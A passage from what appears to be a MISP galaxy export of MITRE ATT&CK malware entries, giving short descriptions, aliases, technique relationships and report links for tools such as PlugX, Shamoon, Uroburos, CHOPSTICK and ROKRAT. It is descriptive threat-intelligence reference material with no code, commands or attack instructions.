https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99

BACKSPACE - S0031

[BACKSPACE](https://attack.mitre.org/software/S0031) is a backdoor used by [APT30](https://attack.mitre.org/groups/G0013) that dates back to at least 2005. (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="BACKSPACE - S0031"

BACKSPACE - S0031 is also known as:

  • BACKSPACE

  • Lecna

BACKSPACE - S0031 has relationships with:

  • similar: misp-galaxy:tool="Backspace" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 7259. Table References

Links

https://attack.mitre.org/software/S0031

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Dendroid - S0301

[Dendroid](https://attack.mitre.org/software/S0301) is an Android remote access tool (RAT) primarily targeting Western countries. The RAT was available for purchase for $300 and came bundled with a utility to inject the RAT into legitimate applications.(Citation: Lookout-Dendroid)

The tag is: misp-galaxy:mitre-malware="Dendroid - S0301"

Dendroid - S0301 is also known as:

  • Dendroid

Dendroid - S0301 has relationships with:

  • similar: misp-galaxy:rat="Dendroid" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1429" with estimative-language:likelihood-probability="almost-certain"

Table 7260. Table References

Links

https://attack.mitre.org/software/S0301

https://blog.lookout.com/blog/2014/03/06/dendroid/

PlugX - S0013

[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.(Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: New DragonOK)(Citation: Dell TG-3390)

The tag is: misp-galaxy:mitre-malware="PlugX - S0013"

PlugX - S0013 is also known as:

  • PlugX

  • Thoper

  • TVT

  • DestroyRAT

  • Sogu

  • Kaba

  • Korplug

PlugX - S0013 has relationships with:

  • similar: misp-galaxy:malpedia="PlugX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="PlugX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="PlugX" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 7261. Table References

Links

http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf

http://labs.lastline.com/an-analysis-of-plugx

http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/

https://attack.mitre.org/software/S0013

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

Squirrelwaffle - S1030

[Squirrelwaffle](https://attack.mitre.org/software/S1030) is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as [Cobalt Strike](https://attack.mitre.org/software/S0154) and the [QakBot](https://attack.mitre.org/software/S0650) banking trojan.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)

The tag is: misp-galaxy:mitre-malware="Squirrelwaffle - S1030"

Squirrelwaffle - S1030 is also known as:

  • Squirrelwaffle

Table 7262. Table References

Links

https://attack.mitre.org/software/S1030

https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot

https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike

Fysbis - S0410

[Fysbis](https://attack.mitre.org/software/S0410) is a Linux-based backdoor used by [APT28](https://attack.mitre.org/groups/G0007) that dates back to at least 2014.(Citation: Fysbis Palo Alto Analysis)

The tag is: misp-galaxy:mitre-malware="Fysbis - S0410"

Fysbis - S0410 is also known as:

  • Fysbis

Table 7263. Table References

Links

https://attack.mitre.org/software/S0410

https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/

Shamoon - S0140

[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)

The tag is: misp-galaxy:mitre-malware="Shamoon - S0140"

Shamoon - S0140 is also known as:

  • Shamoon

  • Disttrack

Shamoon - S0140 has relationships with:

  • similar: misp-galaxy:tool="Shamoon" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7264. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/

https://attack.mitre.org/software/S0140

https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/

https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html

https://www.symantec.com/connect/blogs/shamoon-attacks

Wiper - S0041

[Wiper](https://attack.mitre.org/software/S0041) is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. (Citation: Dell Wiper)

The tag is: misp-galaxy:mitre-malware="Wiper - S0041"

Wiper - S0041 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 7265. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/

https://attack.mitre.org/software/S0041

MiniDuke - S0051

[MiniDuke](https://attack.mitre.org/software/S0051) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. The [MiniDuke](https://attack.mitre.org/software/S0051) toolset consists of multiple downloader and backdoor components. The loader has been used with other [MiniDuke](https://attack.mitre.org/software/S0051) components as well as in conjunction with [CosmicDuke](https://attack.mitre.org/software/S0050) and [PinchDuke](https://attack.mitre.org/software/S0048). (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="MiniDuke - S0051"

MiniDuke - S0051 is also known as:

  • MiniDuke

MiniDuke - S0051 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7266. Table References

Links

https://attack.mitre.org/software/S0051

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

POSHSPY - S0150

[POSHSPY](https://attack.mitre.org/software/S0150) is a backdoor that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2015. It appears to serve as a secondary backdoor, used if the actors lost access to their primary backdoors. (Citation: FireEye POSHSPY April 2017)

The tag is: misp-galaxy:mitre-malware="POSHSPY - S0150"

POSHSPY - S0150 is also known as:

  • POSHSPY

POSHSPY - S0150 has relationships with:

  • similar: misp-galaxy:malpedia="POSHSPY" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084" with estimative-language:likelihood-probability="almost-certain"

Table 7267. Table References

Links

https://attack.mitre.org/software/S0150

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html

Ixeshe - S0015

[Ixeshe](https://attack.mitre.org/software/S0015) is a malware family that has been used since at least 2009 against targets in East Asia. (Citation: Moran 2013)

The tag is: misp-galaxy:mitre-malware="Ixeshe - S0015"

Ixeshe - S0015 is also known as:

  • Ixeshe

Ixeshe - S0015 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"

Table 7268. Table References

Links

https://attack.mitre.org/software/S0015

https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html

PipeMon - S0501

[PipeMon](https://attack.mitre.org/software/S0501) is a multi-stage modular backdoor used by [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: ESET PipeMon May 2020)

The tag is: misp-galaxy:mitre-malware="PipeMon - S0501"

PipeMon - S0501 is also known as:

  • PipeMon

Table 7269. Table References

Links

https://attack.mitre.org/software/S0501

https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/

HDoor - S0061

[HDoor](https://attack.mitre.org/software/S0061) is malware that has been customized and used by the [Naikon](https://attack.mitre.org/groups/G0019) group. (Citation: Baumgartner Naikon 2015)

The tag is: misp-galaxy:mitre-malware="HDoor - S0061"

HDoor - S0061 is also known as:

  • HDoor

  • Custom HDoor

HDoor - S0061 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089" with estimative-language:likelihood-probability="almost-certain"

Table 7270. Table References

Links

https://attack.mitre.org/software/S0061

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

Hildegard - S0601

[Hildegard](https://attack.mitre.org/software/S0601) is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind [Hildegard](https://attack.mitre.org/software/S0601). (Citation: Unit 42 Hildegard Malware)

The tag is: misp-galaxy:mitre-malware="Hildegard - S0601"

Hildegard - S0601 is also known as:

  • Hildegard

Table 7271. Table References

Links

https://attack.mitre.org/software/S0601

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

Mafalda - S1060

[Mafalda](https://attack.mitre.org/software/S1060) is a flexible interactive implant that has been used by [Metador](https://attack.mitre.org/groups/G1013). Security researchers assess the [Mafalda](https://attack.mitre.org/software/S1060) name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. (Citation: SentinelLabs Metador Sept 2022)

The tag is: misp-galaxy:mitre-malware="Mafalda - S1060"

Mafalda - S1060 is also known as:

  • Mafalda

Table 7272. Table References

Links

https://assets.sentinelone.com/sentinellabs22/metador#page=1

https://attack.mitre.org/software/S1060

SideTwist - S0610

[SideTwist](https://attack.mitre.org/software/S0610) is a C-based backdoor that has been used by [OilRig](https://attack.mitre.org/groups/G0049) since at least 2021.(Citation: Check Point APT34 April 2021)

The tag is: misp-galaxy:mitre-malware="SideTwist - S0610"

SideTwist - S0610 is also known as:

  • SideTwist

Table 7273. Table References

Links

https://attack.mitre.org/software/S0610

https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/

BISCUIT - S0017

[BISCUIT](https://attack.mitre.org/software/S0017) is a backdoor that has been used by [APT1](https://attack.mitre.org/groups/G0006) since as early as 2007. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-malware="BISCUIT - S0017"

BISCUIT - S0017 is also known as:

  • BISCUIT

BISCUIT - S0017 has relationships with:

  • similar: misp-galaxy:tool="BISCUIT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

Table 7274. Table References

Links

https://attack.mitre.org/software/S0017

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Helminth - S0170

[Helminth](https://attack.mitre.org/software/S0170) is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via macros in Excel spreadsheets, and one that is a standalone Windows executable. (Citation: Palo Alto OilRig May 2016)

The tag is: misp-galaxy:mitre-malware="Helminth - S0170"

Helminth - S0170 is also known as:

  • Helminth

Helminth - S0170 has relationships with:

  • similar: misp-galaxy:malpedia="Helminth" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7275. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

https://attack.mitre.org/software/S0170

hcdLoader - S0071

[hcdLoader](https://attack.mitre.org/software/S0071) is a remote access tool (RAT) that has been used by [APT18](https://attack.mitre.org/groups/G0026). (Citation: Dell Lateral Movement)

The tag is: misp-galaxy:mitre-malware="hcdLoader - S0071"

hcdLoader - S0071 is also known as:

  • hcdLoader

hcdLoader - S0071 has relationships with:

  • similar: misp-galaxy:rat="hcdLoader" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7276. Table References

Links

http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/

https://attack.mitre.org/software/S0071

Elise - S0081

[Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)

The tag is: misp-galaxy:mitre-malware="Elise - S0081"

Elise - S0081 is also known as:

  • Elise

  • BKDR_ESILE

  • Page

Elise - S0081 has relationships with:

  • similar: misp-galaxy:malpedia="Elise" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Elise Backdoor" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"

Table 7277. Table References

Links

https://attack.mitre.org/software/S0081

https://www.accenture.com/t20180127T003755Z_w/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf

https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html

Fakecalls - S1080

[Fakecalls](https://attack.mitre.org/software/S1080) is an Android trojan, first detected in January 2021, that masquerades as South Korean banking apps. It has capabilities to intercept calls to banking institutions and even maintain realistic dialogues with the victim using pre-recorded audio snippets.(Citation: kaspersky_fakecalls_0422)

The tag is: misp-galaxy:mitre-malware="Fakecalls - S1080"

Fakecalls - S1080 is also known as:

  • Fakecalls

Table 7278. Table References

Links

https://attack.mitre.org/software/S1080

https://www.kaspersky.com/blog/fakecalls-banking-trojan/44072/

Sykipot - S0018

[Sykipot](https://attack.mitre.org/software/S0018) is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of [Sykipot](https://attack.mitre.org/software/S0018) hijacks smart cards on victims. (Citation: Alienvault Sykipot DOD Smart Cards) The group using this malware has also been referred to as Sykipot. (Citation: Blasco 2013)

The tag is: misp-galaxy:mitre-malware="Sykipot - S0018"

Sykipot - S0018 is also known as:

  • Sykipot

Sykipot - S0018 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7279. Table References

Links

http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments

https://attack.mitre.org/software/S0018

https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards

Volgmer - S0180

[Volgmer](https://attack.mitre.org/software/S0180) is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. (Citation: US-CERT Volgmer Nov 2017)

The tag is: misp-galaxy:mitre-malware="Volgmer - S0180"

Volgmer - S0180 is also known as:

  • Volgmer

Volgmer - S0180 has relationships with:

  • similar: misp-galaxy:tool="Volgmer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Volgmer" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 7280. Table References

Links

https://attack.mitre.org/software/S0180

https://web.archive.org/web/20181126143456/https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2

https://www.us-cert.gov/ncas/alerts/TA17-318B

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF

NightClub - S1090

[NightClub](https://attack.mitre.org/software/S1090) is a modular implant written in C++ that has been used by [MoustachedBouncer](https://attack.mitre.org/groups/G1019) since at least 2014.(Citation: MoustachedBouncer ESET August 2023)

The tag is: misp-galaxy:mitre-malware="NightClub - S1090"

NightClub - S1090 is also known as:

  • NightClub

Table 7281. Table References

Links

https://attack.mitre.org/software/S1090

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

Epic - S0091

[Epic](https://attack.mitre.org/software/S0091) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)

The tag is: misp-galaxy:mitre-malware="Epic - S0091"

Epic - S0091 is also known as:

  • Epic

  • Tavdig

  • Wipbot

  • WorldCupSec

  • TadjMakhal

Epic - S0091 has relationships with:

  • similar: misp-galaxy:tool="Wipbot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Wipbot" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7282. Table References

Links

https://attack.mitre.org/software/S0091

https://securelist.com/the-epic-turla-operation/65545/

Regin - S0019

[Regin](https://attack.mitre.org/software/S0019) is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some [Regin](https://attack.mitre.org/software/S0019) timestamps date back to 2003. (Citation: Kaspersky Regin)

The tag is: misp-galaxy:mitre-malware="Regin - S0019"

Regin - S0019 is also known as:

  • Regin

Regin - S0019 has relationships with:

  • similar: misp-galaxy:tool="Regin" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Regin" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7283. Table References

Links

https://attack.mitre.org/software/S0019

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf

Chaos - S0220

[Chaos](https://attack.mitre.org/software/S0220) is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. (Citation: Chaos Stolen Backdoor)

The tag is: misp-galaxy:mitre-malware="Chaos - S0220"

Chaos - S0220 is also known as:

  • Chaos

Chaos - S0220 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"

Table 7284. Table References

Links

http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/

https://attack.mitre.org/software/S0220

Uroburos - S0022

[Uroburos](https://attack.mitre.org/software/S0022) is a sophisticated cyber espionage tool written in C that has been used by units within Russia’s Federal Security Service (FSB) associated with the [Turla](https://attack.mitre.org/groups/G0010) toolset to collect intelligence on sensitive targets worldwide. [Uroburos](https://attack.mitre.org/software/S0022) has several variants and has undergone nearly constant upgrade since its initial development in 2003 to keep it viable after public disclosures. [Uroburos](https://attack.mitre.org/software/S0022) is typically deployed to external-facing nodes on a targeted network and has the ability to leverage additional tools and TTPs to further exploit an internal network. [Uroburos](https://attack.mitre.org/software/S0022) has interoperable implants for Windows, Linux, and macOS, employs a high level of stealth in communications and architecture, and can easily incorporate new or replacement components.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)(Citation: Kaspersky Turla)

The tag is: misp-galaxy:mitre-malware="Uroburos - S0022"

Uroburos - S0022 is also known as:

  • Uroburos

  • Snake

Uroburos - S0022 has relationships with:

  • similar: misp-galaxy:tool="Turla" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Uroburos (Windows)" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1045" with estimative-language:likelihood-probability="almost-certain"

Table 7285. Table References

Links

https://attack.mitre.org/software/S0022

https://securelist.com/the-epic-turla-operation/65545/

https://www.cisa.gov/sites/default/files/2023-05/aa23-129a_snake_malware_2.pdf

adbupd - S0202

[adbupd](https://attack.mitre.org/software/S0202) is a backdoor used by [PLATINUM](https://attack.mitre.org/groups/G0068) that is similar to [Dipsind](https://attack.mitre.org/software/S0200). (Citation: Microsoft PLATINUM April 2016)

The tag is: misp-galaxy:mitre-malware="adbupd - S0202"

adbupd - S0202 is also known as:

  • adbupd

adbupd - S0202 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084" with estimative-language:likelihood-probability="almost-certain"

Table 7286. Table References

Links

https://attack.mitre.org/software/S0202

https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

CHOPSTICK - S0023

[CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [X-Agent for Android](https://attack.mitre.org/software/S0314).

The tag is: misp-galaxy:mitre-malware="CHOPSTICK - S0023"

CHOPSTICK - S0023 is also known as:

  • CHOPSTICK

  • Backdoor.SofacyX

  • SPLM

  • Xagent

  • X-Agent

  • webhp

CHOPSTICK - S0023 has relationships with:

  • similar: misp-galaxy:tool="CHOPSTICK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="X-Agent (Android)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="X-Agent" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="X-Agent for Android - S0314" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1063" with estimative-language:likelihood-probability="almost-certain"

Table 7287. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf

https://attack.mitre.org/software/S0023

https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf

https://www.justice.gov/file/1080281/download

https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

DroidJack - S0320

[DroidJack](https://attack.mitre.org/software/S0320) is an Android remote access tool that has been observed posing as legitimate applications including the Super Mario Run and Pokemon GO games. (Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)

The tag is: misp-galaxy:mitre-malware="DroidJack - S0320"

DroidJack - S0320 is also known as:

  • DroidJack

DroidJack - S0320 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1429" with estimative-language:likelihood-probability="almost-certain"

Table 7288. Table References

Links

https://attack.mitre.org/software/S0320

https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdoored-pokemon-go-android-app

https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat

Hydraq - S0203

[Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025).(Citation: MicroFocus 9002 Aug 2016)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: ASERT Seven Pointed Dagger Aug 2015)(Citation: FireEye DeputyDog 9002 November 2013)(Citation: ProofPoint GoT 9002 Aug 2017)(Citation: FireEye Sunshop Campaign May 2013)(Citation: PaloAlto 3102 Sept 2015)

The tag is: misp-galaxy:mitre-malware="Hydraq - S0203"

Hydraq - S0203 is also known as:

  • Hydraq

  • Roarur

  • MdmBot

  • HomeUnix

  • Homux

  • HidraQ

  • HydraQ

  • McRat

  • Aurora

  • 9002 RAT

Hydraq - S0203 has relationships with:

  • similar: misp-galaxy:malpedia="Aurora" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Aurora" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="9002 RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"

Table 7289. Table References

Links

https://attack.mitre.org/software/S0203

https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ

https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf

https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html

https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html

https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures

https://www.symantec.com/connect/blogs/trojanhydraq-incident

ZeroT - S0230

[ZeroT](https://attack.mitre.org/software/S0230) is a Trojan used by [TA459](https://attack.mitre.org/groups/G0062), often in conjunction with [PlugX](https://attack.mitre.org/software/S0013). (Citation: Proofpoint TA459 April 2017) (Citation: Proofpoint ZeroT Feb 2017)

The tag is: misp-galaxy:mitre-malware="ZeroT - S0230"

ZeroT - S0230 is also known as:

  • ZeroT

ZeroT - S0230 has relationships with:

  • similar: misp-galaxy:malpedia="ZeroT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="ZeroT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 7290. Table References

Links

https://attack.mitre.org/software/S0230

https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx

https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts

Twitoor - S0302

[Twitoor](https://attack.mitre.org/software/S0302) is a dropper application capable of receiving commands from social media.(Citation: ESET-Twitoor)

The tag is: misp-galaxy:mitre-malware="Twitoor - S0302"

Twitoor - S0302 is also known as:

  • Twitoor

Twitoor - S0302 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 7291. Table References

Links

http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/

https://attack.mitre.org/software/S0302

Get2 - S0460

[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBbot](https://attack.mitre.org/software/S0461).(Citation: Proofpoint TA505 October 2019)

The tag is: misp-galaxy:mitre-malware="Get2 - S0460"

Get2 - S0460 is also known as:

  • Get2

Table 7292. Table References

Links

https://attack.mitre.org/software/S0460

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

LOWBALL - S0042

[LOWBALL](https://attack.mitre.org/software/S0042) is malware used by [admin@338](https://attack.mitre.org/groups/G0018). It was used in August 2015 in email messages targeting Hong Kong-based media organizations. (Citation: FireEye admin@338)

The tag is: misp-galaxy:mitre-malware="LOWBALL - S0042"

LOWBALL - S0042 is also known as:

  • LOWBALL

LOWBALL - S0042 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7293. Table References

Links

https://attack.mitre.org/software/S0042

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

ROKRAT - S0240

[ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067) to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) has used ROKRAT during several campaigns from 2016 through 2021.(Citation: Talos ROKRAT)(Citation: Talos Group123)(Citation: Volexity InkySquid RokRAT August 2021)

The tag is: misp-galaxy:mitre-malware="ROKRAT - S0240"

ROKRAT - S0240 is also known as:

  • ROKRAT

Table 7294. Table References

Links

https://attack.mitre.org/software/S0240

https://blog.talosintelligence.com/2017/04/introducing-rokrat.html

https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html

https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/

